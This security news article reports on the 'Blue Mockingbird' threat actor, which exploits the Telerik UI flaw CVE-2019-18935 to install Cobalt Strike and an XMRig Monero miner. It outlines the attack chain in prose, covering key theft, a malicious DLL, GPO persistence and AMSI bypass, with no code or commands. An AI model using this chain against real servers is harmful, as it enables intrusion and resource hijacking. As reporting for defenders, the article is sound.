‘Blue Mockingbird’, a threat actor, targets Telerik UI vulnerabilities to compromise servers, install Cobalt Strike beacons, and mine Monero by hijacking system resources.
The attacker leverages the CVE-2019-18935 flaw, a critical severity (CVSS v3.1: 9.8) deserialisation that leads to remote code execution in the Telerik UI library for ASP.NET AJAX.
In May 2020, the same threat actor was observed targeting vulnerable Microsoft IIS Servers that used Telerik UI.
Sophos researchers reported this week that, according to their detection data, Blue Mockingbird is still using the same flaw to launch cyberattacks.
To exploit CVE-2019-18935, the attackers require the encryption keys that protect Telerik UI’s serialisation on the target. This information can be obtained by using CVE-2017-11317 and CVE-2017-11357 or by exploiting another vulnerability in the target web app.
Many web apps were projects that embedded the Telerik UI framework version available at time of development and then were forgotten about or discontinued. This means that there are still valid targets available for exploitation.
Once acquired, the attackers can compile a malicious DLL containing the code to be executed during desealisation and run it within the context of the ‘w3wp.exe’ process.
Sophos spotted that Blue Mockingbird employs a readily available proof-of-concept (PoC) exploit, which automates the DLL compilation and handles the encryption logic.
The payload used in the recent attacks is a Cobalt Strike beacon, a legitimate penetration testing tool Blue Mockingbird abuses for executing encoded PowerShell commands.
Persistence is established via Active Directory Group Policy Objects (GPOs), which create scheduled tasks written in a new registry key containing base64-encoded PowerShell.
In order to evade Windows Defender detection to download and load a Cobalt Strike DLL onto memory, the script uses common AMSI-bypassing techniques.
The second-stage executable (‘crby26td.exe’) is an XMRig Miner, a standard open-source cryptocurrency miner used for mining Monero. Monero is one of the least traceable crypto coins.
This was the threat actor’s main goal in their 2020 campaign.
The deployment of Cobalt Strike opens the way to easy lateral movement within the compromised network, account takeover, data exfiltration, and deployment of more potent payloads.